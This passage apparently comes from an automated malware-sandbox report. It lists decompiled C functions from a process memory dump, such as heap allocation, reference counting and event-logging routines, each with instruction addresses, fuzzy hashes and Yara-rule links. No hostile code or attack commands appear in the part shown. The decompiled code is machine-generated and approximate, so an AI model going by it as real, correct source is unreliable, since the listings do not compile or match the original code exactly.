					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E033CD268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L033B77F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}

0x034146b7
0x034146ba
0x034146c5
0x034146c8
0x034146d0
0x034146d4
0x034146e6
0x034146e9
0x034146f4
0x034146ff
0x03414705
0x03414706
0x0341470c
0x03414713
0x0341471b
0x03414723
0x03414725
0x034146d6
0x034146d9
0x034146db
0x034146db
0x03414732

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
Instruction ID: b8498e4c46f4cb8658756aee4c6e9e3abe6ee533ec727426cc78719ea9fca904
Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
Instruction Fuzzy Hash: 90110276904208BBC701DF5DD8C08BEB7B9EF85304F1080AAF9448B350DA318D51C3A4

Uniqueness

Uniqueness Score: -1.00%

Function 033A766D, Relevance: .1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E033A766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				char _v8;
				void* _t22;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t42;
				intOrPtr _t47;

				_push(__ecx);
				_t36 =  &_v8;
				if(E033CF3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
					L10:
					_t22 = 0;
				} else {
					_t24 = _v8 + __ecx;
					_t42 = _t24;
					if(_t24 < __ecx) {
						goto L10;
					} else {
						if(E033CF3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
							goto L10;
						} else {
							_t29 = _v8 + _t42;
							if(_t29 < _t42) {
								goto L10;
							} else {
								_t47 = _t29;
								_t30 = _a16;
								if(_t30 != 0) {
									 *_t30 = _t47;
								}
								if(_t47 == 0) {
									goto L10;
								} else {
									_t22 = L033B4620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
								}
							}
						}
					}
				}
				return _t22;
			}

0x033a7672
0x033a767f
0x033a7689
0x033a76de
0x033a76de
0x033a768b
0x033a7691
0x033a7693
0x033a7697
0x00000000
0x033a7699
0x033a76a8
0x00000000
0x033a76aa
0x033a76ad
0x033a76b1
0x00000000
0x033a76b3
0x033a76b3
0x033a76b5
0x033a76ba
0x033a76bc
0x033a76bc
0x033a76c0
0x00000000
0x033a76c2
0x033a76ce
0x033a76ce
0x033a76c0
0x033a76b1
0x033a76a8
0x033a7697
0x033a76d9

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
Instruction ID: 0c8756a2ae8108061c9bc99ae06bae68b8de3141a61d0bb8d92109e72a8550ca
Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
Instruction Fuzzy Hash: 43018832B11919ABC720DE9ECCC5F5BB7ADEB84660B140624B908DF261DA30DD01C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 03399080, Relevance: .1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E03399080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x34885ec;
				E033B2280(_t48, 0x34885ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E033AFFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x348538c; // 0x77f06848
					if( *_t84 != 0x3485388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x346f6e8);
						E033ED0E8(0x34885ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E034688F5(_t80, _t85, 0x3485388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x34886c0; // 0x5207b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x34886b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E033B2280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E034688F5(0x34885ec, _t85, 0x3485388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E033DAFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x348b1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x34884c0;
																			if(_t82 >=  *0x34884c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E03469063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E0339922A(_t99);
										_t64 = E033B7D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E03468B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x34886c0; // 0x5207b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x34886b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x34886bc;
													_t87 = 0x34886b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E03399240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x34886c4;
												_t87 = 0x34886c0;
												L27:
												E033C9B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E033ED130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x3485388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x348538c = _t51;
						goto L6;
					}
				}
			}

0x03399082
0x03399083
0x03399084
0x03399085
0x03399087
0x03399096
0x03399098
0x03399098
0x0339909e
0x033990a8
0x033990e7
0x033990e7
0x033990aa
0x033990b0
0x033990b7
0x033990bd
0x033990dd
0x033990e6
0x033990bf
0x033990bf
0x033990c7
0x033990cf
0x033990f1
0x033990f2
0x033990f4
0x033990f5
0x033990f6
0x033990f7
0x033990f8
0x033990f9
0x033990fa
0x033990fb
0x033990fc
0x033990fd
0x033990fe
0x033990ff
0x03399100
0x03399102
0x03399107
0x0339910c
0x03399110
0x03399113
0x03399115
0x03399136
0x0339913f
0x03399143
0x033f37e4
0x033f37e4
0x03399117
0x03399117
0x0339911d
0x00000000
0x0339911f
0x0339911f
0x03399125
0x00000000
0x03399127
0x0339912d
0x03399130
0x03399134
0x03399158
0x0339915d
0x03399161
0x03399168
0x033f3715
0x0339916e
0x0339916e
0x03399175
0x03399177
0x0339917e
0x0339917f
0x03399182
0x03399182
0x03399187
0x03399187
0x0339918a
0x0339918d
0x0339918f
0x03399192
0x03399195
0x03399198
0x03399198
0x03399198
0x0339919a
0x00000000
0x00000000
0x033f371f
0x033f3721
0x033f3727
0x033f372f
0x033f3733
0x033f3735
0x033f3738
0x033f373b
0x033f373d
0x033f3740
0x00000000
0x033f3746
0x033f3746
0x033f3749
0x00000000
0x033f374f
0x033f374f
0x033f3751
0x033f3757
0x033f3759
0x033f375c
0x033f375c
0x033f375e
0x033f375e
0x033f3761
0x033f3764
0x00000000
0x00000000
0x033f3766
0x033f3768
0x033f37a3
0x033f37a3
0x033f37a5
0x033f37a7
0x033f37ad
0x033f37b0
0x033f37b2
0x033f37bc
0x033f37c2
0x033f37c2
0x033f37b2
0x03399187
0x03399187
0x0339918a
0x0339918d
0x0339918f
0x03399192
0x03399195
0x00000000
0x03399195
0x00000000
0x033f376a
0x033f376a
0x033f376a
0x033f376c
0x033f376c
0x033f376f
0x033f3775
0x00000000
0x00000000
0x033f3777
0x033f3779
0x033f3782
0x033f3787
0x033f3789
0x033f3790
0x033f3790
0x033f378b
0x033f378b
0x033f378b
0x033f3792
0x033f3795
0x00000000
0x033f3795
0x00000000
0x033f3779
0x033f3798
0x00000000
0x033f3798
0x00000000
0x033f3768
0x033f379b
0x033f379b
0x033f3751
0x033f3749
0x00000000
0x033f3740
0x033991a0
0x033991a3
0x033991a9
0x033991b0
0x00000000
0x033991b0
0x03399187
0x033991b4
0x033991b4
0x033991bb
0x033991c0
0x033991c5
0x033991c7
0x033f37da
0x033991cd
0x033991cd
0x033991cd
0x033991d2
0x033991d5
0x03399239
0x03399239
0x033991d7
0x033991db
0x033991e1
0x033991e7
0x033991fd
0x03399203
0x0339921e
0x03399223
0x00000000
0x03399205
0x03399205
0x03399208
0x0339920c
0x03399214
0x03399214
0x0339920c
0x033991e9
0x033991e9
0x033991ee
0x033991f3
0x033991f3
0x033991f3
0x033991e7
0x00000000
0x00000000
0x00000000
0x03399134
0x03399125
0x0339911d
0x0339914e
0x033990d1
0x033990d1
0x033990d3
0x033990d6
0x033990d8
0x00000000
0x033990d8
0x033990cf

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14ba9242331d334c44076253c9548d7b33ea0c792d6dfaee93902d888714875f
Instruction ID: f08d5586bdae76ff4d94232073d5bfc8fde258c78ffa3759f7173c8cdb3b2939
Opcode Fuzzy Hash: 14ba9242331d334c44076253c9548d7b33ea0c792d6dfaee93902d888714875f
Instruction Fuzzy Hash: F8018172901604CFE715DF18DC80B16BBA9EB46320F2641ABE515DF791C378DC41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 03464015, Relevance: .0, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E03464015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E033B2280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E033B2280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x34886ac);
					E0339F900(0x34886d4, _t28);
					E033AFFB0(0x34886ac, _t28, 0x34886ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E033AFFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L033B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L033B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}

0x0346401a
0x0346401e
0x03464023
0x03464028
0x03464029
0x0346402b
0x0346402f
0x03464043
0x03464046
0x03464051
0x03464057
0x0346405f
0x03464062
0x03464067
0x0346406f
0x0346407c
0x0346407c
0x0346408c
0x0346408c
0x03464097

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a75de8b1df64800cfb14ee42d2390a69b02f248000136990ea53128ecb40867a
Instruction ID: b549d7629b1393d206fea88c3ab892b9d2512149e0b8f52eccc2de47a66da783
Opcode Fuzzy Hash: a75de8b1df64800cfb14ee42d2390a69b02f248000136990ea53128ecb40867a
Instruction Fuzzy Hash: 25018F76A41A49BFD751EF69CDC0E57B7ACEF85660B000226B618CFA21CB24EC11C6E4

Uniqueness

Uniqueness Score: -1.00%

Function 0345138A, Relevance: .0, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E0345138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x348d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E033DFA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E033B7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E033DB640(E033D9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x0345138a
0x0345138a
0x03451399
0x034513a3
0x034513a8
0x034513aa
0x034513b5
0x034513bb
0x034513c3
0x034513c6
0x034513c9
0x034513d4
0x034513e6
0x034513d6
0x034513df
0x034513df
0x034513f1
0x034513f2
0x034513f4
0x034513f9
0x0345140e

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a7aa25fbe58d4ce0416fa825ae4a6fc48d82470f266769478300b61b541c28b
Instruction ID: 2d570d3e6d9d0d13b1cd3da81d04ce7a410ad271c5143f2e59835cf6e39432dc
Opcode Fuzzy Hash: 1a7aa25fbe58d4ce0416fa825ae4a6fc48d82470f266769478300b61b541c28b
Instruction Fuzzy Hash: EE015275E01318AFDB14DFA9D881FAEB7B8EF45750F04406AB905EF381D6749A01CB94

Uniqueness

Uniqueness Score: -1.00%

Function 034514FB, Relevance: .0, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E034514FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x348d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E033DFA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E033B7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E033DB640(E033D9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x034514fb
0x034514fb
0x0345150a
0x03451514
0x03451519
0x0345151b
0x03451526
0x0345152c
0x03451534
0x03451537
0x0345153a
0x03451545
0x03451557
0x03451547
0x03451550
0x03451550
0x03451562
0x03451563
0x03451565
0x0345156a
0x0345157f

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd2bc43d2c2cb81ceefcc3f76bb06544d6e851cbbc617620b0b45459d19e4951
Instruction ID: 4cdbb1968f105120be6145b6f0a259c0d5e8e579b759a5e2c153d5c024ba232e
Opcode Fuzzy Hash: dd2bc43d2c2cb81ceefcc3f76bb06544d6e851cbbc617620b0b45459d19e4951
Instruction Fuzzy Hash: C0018075E01258AFCB00EF68D881FAEB7B8EF45700F00405AB915EF380D670DA00CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0344FE3F, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E0344FE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x348d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E033DFA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E033B7D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E033DB640(E033D9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x0344fe3f
0x0344fe3f
0x0344fe4e
0x0344fe58
0x0344fe5d
0x0344fe5f
0x0344fe6a
0x0344fe72
0x0344fe75
0x0344fe78
0x0344fe83
0x0344fe95
0x0344fe85
0x0344fe8e
0x0344fe8e
0x0344fea0
0x0344fea1
0x0344fea3
0x0344fea8
0x0344febd

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5b95201bb0c7ba6744eff1dde1e48b555d0afe18960b646277611aa4d65b835
Instruction ID: e01b3f278c096b52822ea1443ad09f013427ae135bac85c004f6e097ec7b9e40
Opcode Fuzzy Hash: b5b95201bb0c7ba6744eff1dde1e48b555d0afe18960b646277611aa4d65b835
Instruction Fuzzy Hash: FA018475E01318AFDB14DFA9E845FAEBBB8EF44700F04406AB900AF381DA709901C795

Uniqueness

Uniqueness Score: -1.00%

Function 0344FEC0, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E0344FEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x348d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E033DFA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E033B7D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E033DB640(E033D9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x0344fec0
0x0344fec0
0x0344fecf
0x0344fed9
0x0344fede
0x0344fee0
0x0344feeb
0x0344fef3
0x0344fef6
0x0344fef9
0x0344ff04
0x0344ff16
0x0344ff06
0x0344ff0f
0x0344ff0f
0x0344ff21
0x0344ff22
0x0344ff24
0x0344ff29
0x0344ff3e

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74fd0b60a93cc47b91d0ca8df42e917c484ffdaea1eb908ab0e51051c194126e
Instruction ID: 77b76a62def46d2902ffcbdeefe16cabd618a2c918397701f08203e90d82d8c3
Opcode Fuzzy Hash: 74fd0b60a93cc47b91d0ca8df42e917c484ffdaea1eb908ab0e51051c194126e
Instruction Fuzzy Hash: CA018475E01318AFDB14DBA9E885FAFB7B8EF45700F04406AB901AF380DA709A01C794

Uniqueness

Uniqueness Score: -1.00%

Function 033AB02A, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E033AB02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E033B7D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E03417016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}

0x033ab037
0x033ab039
0x033ab03b
0x033ab040
0x033fa60e
0x00000000
0x00000000
0x033fa61d
0x033ab04b
0x033ab04e
0x033fa627
0x033fa634
0x00000000
0x00000000
0x033fa641
0x033fa653
0x033fa643
0x033fa64c
0x033fa64c
0x033fa65b
0x00000000
0x00000000
0x00000000
0x033fa66c
0x033ab057
0x033ab057
0x033ab057
0x033ab046
0x033ab046
0x00000000

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
Instruction ID: 8c844bb65f40f1d2dd8387e09efe6a7e3adb1cee4d50ef9ad870b0865db32a80
Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
Instruction Fuzzy Hash: 7F017C72204A809FD322C71DC9C8F66BBECEB45790F0940A1EA19CBA61D728DC40D620

Uniqueness

Uniqueness Score: -1.00%

Function 03461074, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E03461074(intOrPtr __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
					E0346165E(__ebx, 0x3488ae4, (__edx -  *0x3488b04 >> 0x14) + (__edx -  *0x3488b04 >> 0x14), __edi, __ecx, (__edx -  *0x3488b04 >> 0x14) + (__edx -  *0x3488b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E0345AFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E033B7D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E0344FE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}

0x03461074
0x03461080
0x03461082
0x0346108a
0x0346108f
0x03461093
0x034610ab
0x034610ab
0x034610c3
0x034610cf
0x034610e1
0x034610d1
0x034610da
0x034610da
0x034610e9
0x034610f5
0x034610f5
0x034610fe

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
